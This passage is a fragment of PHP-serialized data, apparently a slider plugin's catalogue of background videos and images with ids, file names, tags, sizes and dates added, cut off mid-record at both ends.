11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:349;a:13:{s:2:\"id\";s:3:\"489\";s:6:\"handle\";s:9:\"Ocean.jpg\";s:5:\"video\";s:9:\"Ocean.mp4\";s:4:\"name\";s:6:\"Ocean \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:350;a:13:{s:2:\"id\";s:3:\"488\";s:6:\"handle\";s:9:\"Waves.jpg\";s:5:\"video\";s:9:\"Waves.mp4\";s:4:\"name\";s:6:\"Waves \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:24:15\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:351;a:13:{s:2:\"id\";s:3:\"487\";s:6:\"handle\";s:10:\"Hearts.jpg\";s:5:\"video\";s:10:\"Hearts.mp4\";s:4:\"name\";s:7:\"Hearts \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:352;a:13:{s:2:\"id\";s:3:\"486\";s:6:\"handle\";s:12:\"Octagons.jpg\";s:5:\"video\";s:12:\"Octagons.mp4\";s:4:\"name\";s:9:\"Octagons \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:353;a:13:{s:2:\"id\";s:3:\"485\";s:6:\"handle\";s:11:\"Squares.jpg\";s:5:\"video\";s:11:\"Squares.mp4\";s:4:\"name\";s:8:\"Squares \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:354;a:13:{s:2:\"id\";s:3:\"484\";s:6:\"handle\";s:12:\"Pink-ink.jpg\";s:5:\"video\";s:12:\"Pink-ink.mp4\";s:4:\"name\";s:9:\"Pink ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:355;a:13:{s:2:\"id\";s:3:\"483\";s:6:\"handle\";s:22:\"Blurred-Background.jpg\";s:5:\"video\";s:22:\"Blurred-Background.mp4\";s:4:\"name\";s:19:\"Blurred Background \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:356;a:13:{s:2:\"id\";s:3:\"482\";s:6:\"handle\";s:20:\"Blinking-bubbles.jpg\";s:5:\"video\";s:20:\"Blinking-bubbles.mp4\";s:4:\"name\";s:17:\"Blinking bubbles \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:357;a:13:{s:2:\"id\";s:3:\"481\";s:6:\"handle\";s:13:\"Fireworks.jpg\";s:5:\"video\";s:13:\"Fireworks.mp4\";s:4:\"name\";s:10:\"Fireworks \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:358;a:13:{s:2:\"id\";s:3:\"480\";s:6:\"handle\";s:12:\"Dark-ink.jpg\";s:5:\"video\";s:12:\"Dark-ink.mp4\";s:4:\"name\";s:9:\"Dark ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:359;a:13:{s:2:\"id\";s:3:\"238\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:360;a:13:{s:2:\"id\";s:3:\"237\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:361;a:13:{s:2:\"id\";s:3:\"236\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:362;a:13:{s:2:\"id\";s:3:\"235\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:363;a:13:{s:2:\"id\";s:3:\"234\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:364;a:13:{s:2:\"id\";s:3:\"233\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:365;a:13:{s:2:\"id\";s:3:\"232\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:366;a:13:{s:2:\"id\";s:3:\"231\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:367;a:13:{s:2:\"id\";s:3:\"230\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:368;a:13:{s:2:\"id\";s:3:\"229\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:369;a:13:{s:2:\"id\";s:3:\"339\";s:6:\"handle\";s:19:\"best_price_dark.jpg\";s:5:\"video\";s:19:\"best_price_dark.mp4\";s:4:\"name\";s:15:\"best_price_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"best_price_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:370;a:13:{s:2:\"id\";s:3:\"337\";s:6:\"handle\";s:27:\"limited_time_offer_dark.jpg\";s:5:\"video\";s:27:\"limited_time_offer_dark.mp4\";s:4:\"name\";s:23:\"limited_time_offer_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:23:\"limited_time_offer_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:371;a:13:{s:2:\"id\";s:3:\"336\";s:6:\"handle\";s:26:\"slider_revolution_dark.jpg\";s:5:\"video\";s:26:\"slider_revolution_dark.mp4\";s:4:\"name\";s:22:\"slider_revolution_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:22:\"slider_revolution_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:372;a:13:{s:2:\"id\";s:3:\"335\";s:6:\"handle\";s:19:\"mick_brown_dark.jpg\";s:5:\"video\";s:19:\"mick_brown_dark.mp4\";s:4:\"name\";s:15:\"mick_brown_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"mick_brown_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:373;a:13:{s:2:\"id\";s:3:\"334\";s:6:\"handle\";s:14:\"sales_dark.jpg\";s:5:\"video\";s:14:\"sales_dark.mp4\";s:4:\"name\";s:10:\"sales_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:10:\"sales_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:374;a:13:{s:2:\"id\";s:3:\"333\";s:6:\"handle\";s:21:\"robert_smith_dark.jpg\";s:5:\"video\";s:21:\"robert_smith_dark.mp4\";s:4:\"name\";s:17:\"robert_smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"robert_smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:375;a:13:{s:2:\"id\";s:3:\"332\";s:6:\"handle\";s:21:\"product_name_dark.jpg\";s:5:\"video\";s:21:\"product_name_dark.mp4\";s:4:\"name\";s:17:\"product_name_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"product_name_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:376;a:13:{s:2:\"id\";s:3:\"331\";s:6:\"handle\";s:21:\"high_quality_dark.jpg\";s:5:\"video\";s:21:\"high_quality_dark.mp4\";s:4:\"name\";s:17:\"high_quality_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"high_quality_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:377;a:13:{s:2:\"id\";s:3:\"330\";s:6:\"handle\";s:24:\"robert_johnson_light.jpg\";s:5:\"video\";s:24:\"robert_johnson_light.mp4\";s:4:\"name\";s:20:\"robert_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"robert_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:378;a:13:{s:2:\"id\";s:3:\"329\";s:6:\"handle\";s:21:\"jake_collins_dark.jpg\";s:5:\"video\";s:21:\"jake_collins_dark.mp4\";s:4:\"name\";s:17:\"jake_collins_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"jake_collins_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:379;a:13:{s:2:\"id\";s:3:\"328\";s:6:\"handle\";s:22:\"daniele_wood_light.jpg\";s:5:\"video\";s:22:\"daniele_wood_light.mp4\";s:4:\"name\";s:18:\"daniele_wood_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"daniele_wood_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:31:30\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:380;a:13:{s:2:\"id\";s:3:\"327\";s:6:\"handle\";s:23:\"michael_blake_light.jpg\";s:5:\"video\";s:23:\"michael_blake_light.mp4\";s:4:\"name\";s:19:\"michael_blake_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"michael_blake_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:381;a:13:{s:2:\"id\";s:3:\"326\";s:6:\"handle\";s:22:\"product_name_light.jpg\";s:5:\"video\";s:22:\"product_name_light.mp4\";s:4:\"name\";s:18:\"product_name_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"product_name_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:382;a:13:{s:2:\"id\";s:3:\"325\";s:6:\"handle\";s:24:\"rebecca_cooper_light.jpg\";s:5:\"video\";s:24:\"rebecca_cooper_light.mp4\";s:4:\"name\";s:20:\"rebecca_cooper_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"rebecca_cooper_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:383;a:13:{s:2:\"id\";s:3:\"324\";s:6:\"handle\";s:28:\"limited_time_offer_light.jpg\";s:5:\"video\";s:28:\"limited_time_offer_light.mp4\";s:4:\"name\";s:24:\"limited_time_offer_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:24:\"limited_time_offer_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:384;a:13:{s:2:\"id\";s:3:\"322\";s:6:\"handle\";s:22:\"jake_michael_light.jpg\";s:5:\"video\";s:22:\"jake_michael_light.mp4\";s:4:\"name\";s:18:\"jake_michael_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"jake_michael_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:385;a:13:{s:2:\"id\";s:3:\"321\";s:6:\"handle\";s:23:\"colin_johnson_light.jpg\";s:5:\"video\";s:23:\"colin_johnson_light.mp4\";s:4:\"name\";s:19:\"colin_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"colin_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:386;a:13:{s:2:\"id\";s:3:\"320\";s:6:\"handle\";s:21:\"colin_morris_dark.jpg\";s:5:\"video\";s:21:\"colin_morris_dark.mp4\";s:4:\"name\";s:17:\"colin_morris_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"colin_morris_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:387;a:13:{s:2:\"id\";s:3:\"319\";s:6:\"handle\";s:22:\"justin_cooper_dark.jpg\";s:5:\"video\";s:22:\"justin_cooper_dark.mp4\";s:4:\"name\";s:18:\"justin_cooper_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"justin_cooper_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:388;a:13:{s:2:\"id\";s:3:\"318\";s:6:\"handle\";s:21:\"james-dodson_dark.jpg\";s:5:\"video\";s:21:\"james-dodson_dark.mp4\";s:4:\"name\";s:17:\"james-dodson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"james-dodson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:389;a:13:{s:2:\"id\";s:3:\"317\";s:6:\"handle\";s:23:\"robert_sanders_dark.jpg\";s:5:\"video\";s:23:\"robert_sanders_dark.mp4\";s:4:\"name\";s:19:\"robert_sanders_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"robert_sanders_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 